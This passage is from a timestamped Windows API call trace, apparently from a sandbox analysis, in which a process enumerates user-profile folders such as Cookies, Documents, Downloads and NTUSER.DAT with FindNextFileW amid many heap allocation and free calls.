(HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.380] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x38) returned 0x327ca80 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.380] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x54) returned 0x3296380 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32618f0 [0056.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x327ca80 | out: hHeap=0x660000) returned 1 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.381] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269568 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260fa8 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32618f0 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.381] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb331210, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0xb331210, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa8) returned 0x3201650 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32618f0 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260fa8 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269568 | out: hHeap=0x660000) returned 1 [0056.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.382] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ff2490, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x6ff2490, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x32898e0 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32898e0 | out: hHeap=0x660000) returned 1 [0056.382] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x32898e0 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xfc) returned 0x3234418 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b450 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260fa8 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b380 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32618f0 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32898e0 | out: hHeap=0x660000) returned 1 [0056.382] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0056.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x32898e0 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32898e0 | out: hHeap=0x660000) returned 1 [0056.383] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261790 | out: hHeap=0x660000) returned 1 [0056.383] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b1e0 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x16c) returned 0x9c7a8a0 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261790 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b0a8 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32618f0 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261528 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b520 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b588 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b5f0 [0056.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261948 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260e48 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b450 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260b30 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260fa8 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b380 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b4b8 | out: hHeap=0x660000) returned 1 [0056.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b040 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b040 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b1e0 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x729fd50, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x729fd50, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260fa8 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b1e0 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b4b8 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b1e0 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b3e8 | out: hHeap=0x660000) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260b30 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3260ce8 | out: hHeap=0x660000) returned 1 [0056.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261108 | out: hHeap=0x660000) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0056.384] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x741cb10, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x741cb10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0056.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261108 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260ce8 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x214) returned 0x3294c50 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3260e48 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b3e8 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x32619a0 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3299ec8 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3299f20 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b1e0 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b380 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b450 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3299f78 [0056.385] RtlAllocateHeap (HeapHandle=0x660000, 